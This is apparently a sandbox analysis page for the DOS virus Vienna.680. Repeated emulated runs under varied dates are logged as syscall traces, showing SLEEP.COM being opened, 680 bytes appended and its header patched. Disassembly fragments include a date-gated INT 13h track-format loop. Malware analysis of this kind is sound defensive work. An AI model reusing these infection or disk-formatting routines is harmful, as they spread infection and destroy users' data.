Sample viewer

vx.netlux.org/Virus.DOS.Vienna.680

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:40.960487351Z 48 PC: 12a69 | Get DOS version
2018-12-17T22:54:40.962148225Z 47 PC: 12a75 | Get disk transfer address
2018-12-17T22:54:40.964597693Z 26 PC: 12a85 | Set disk transfer address
2018-12-17T22:54:40.966438045Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-17T22:54:40.969248743Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
0x12ac7: mov ch, 0
0x12ac9: mov dh, 0
0x12acb: mov dl, byte ptr [0x334]
0x12acf: int 0x13
0x12ad1: ret
2018-12-17T22:54:40.972621197Z 42 PC: 12aab | Get date 0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
0x12ac7: mov ch, 0
0x12ac9: mov dh, 0
0x12acb: mov dl, byte ptr [0x334]
0x12acf: int 0x13
0x12ad1: ret
0x12ad2: pop si
0x12ad3: push si
0x12ad4: add si, 0x2d
0x12ad7: lodsb al, byte ptr [si]
0x12ad8: mov cx, 0x8000
2018-12-17T22:54:40.976118056Z 78 PC: 12b4a | Find first file
2018-12-17T22:54:40.983097977Z 67 PC: 12b86 | Get or set file attributes
2018-12-17T22:54:40.990227569Z 67 PC: 12b96 | Get or set file attributes
2018-12-17T22:54:41.008115821Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:41.015032303Z 87 PC: 12bac | Get or set file date and time
2018-12-17T22:54:41.028143608Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-17T22:54:41.030473702Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:54:41.037281418Z 66 PC: 12bd9 | Move file pointer
2018-12-17T22:54:41.03952533Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-17T22:54:41.049256155Z 66 PC: 12c0e | Move file pointer
2018-12-17T22:54:41.050858981Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:54:41.058064566Z 87 PC: 12c2d | Get or set file date and time
2018-12-17T22:54:41.06087862Z 62 PC: 12c31 | Close file
2018-12-17T22:54:41.070574941Z 67 PC: 12c3e | Get or set file attributes
2018-12-17T22:54:41.081774961Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.180076547Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.182389307Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.186014862Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:57.18723001Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:57.197873887Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.205978026Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.212631651Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.237768725Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.259422463Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:57.265622676Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:57.268215392Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.276112503Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.278159698Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.288495051Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.290614403Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.301083079Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.305692866Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.317912317Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.332031528Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1990,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.264898882Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.272089361Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.273764646Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:57.275392989Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:57.278200777Z 42 PC: 12aa0 | Get date 0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
0x12ac7: mov ch, 0
0x12ac9: mov dh, 0
0x12acb: mov dl, byte ptr [0x334]
0x12acf: int 0x13
0x12ad1: ret
2018-12-25T12:30:57.281791087Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.288967019Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.2964557Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.316703346Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.32451858Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:57.326400696Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:57.330276976Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.338706077Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.340737728Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.353297347Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.354878548Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.362197698Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.364116171Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.373890772Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.385197075Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.52456384Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.526179742Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.527602619Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:57.52877317Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:57.532340871Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.541041639Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.54783871Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.564697524Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.57272899Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:57.574739103Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:57.577560849Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.585728282Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.587574869Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.597141107Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.599034151Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.612656779Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.614801636Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.623883566Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.635387557Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":9,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:57.828877578Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:57.830259541Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:57.831267593Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:57.832151712Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:57.833952235Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:57.842383129Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:57.846630763Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:57.859211662Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:57.864592684Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:57.865650084Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:57.867246686Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:57.872401822Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:57.87914754Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:57.885177798Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:57.887364264Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:57.891684308Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:57.893124669Z 62 PC: 12c31 | Close file
2018-12-25T12:30:57.908784526Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:57.919502036Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:58.167423774Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:58.169940317Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:58.171636237Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:58.173309846Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:58.176279909Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:58.188735373Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:58.194949165Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:58.220553917Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:58.226663007Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:58.227939007Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:58.229916255Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:58.237452764Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:58.239300627Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:58.245616599Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:58.247657796Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:58.25775934Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:58.259703016Z 62 PC: 12c31 | Close file
2018-12-25T12:30:58.269229612Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:58.280679629Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:58.477337645Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:58.480110062Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:58.482048589Z 26 PC: 12a85 | Set disk transfer address
2018-12-25T12:30:58.483656088Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6
0x12a98: jge 0x12a9c
0x12a9a: jmp 0x12ad2
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21
0x12aa0: cmp dh, 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21
0x12aab: cmp dl, 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]
0x12ab5: call 0x12ac5
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2
0x12ac5: mov ah, 5
2018-12-25T12:30:58.486579094Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:58.49939165Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:58.506112522Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:58.524727785Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:58.533533131Z 87 PC: 12bac | Get or set file date and time
2018-12-25T12:30:58.535386773Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7
0x12bb9: jmp 0x12bbb
0x12bbb: mov ah, 0x3f
0x12bbd: mov cx, 3
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c
0x12bce: mov ax, 0x4202
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax
0x12be3: add cx, 0x30b
0x12be7: mov di, si
2018-12-25T12:30:58.538124683Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:58.546274994Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:58.548250549Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:58.557966668Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:58.560347973Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:58.567748445Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:58.569465423Z 62 PC: 12c31 | Close file
2018-12-25T12:30:58.57890931Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:58.591606367Z 26 PC: 12c49 | Set disk transfer address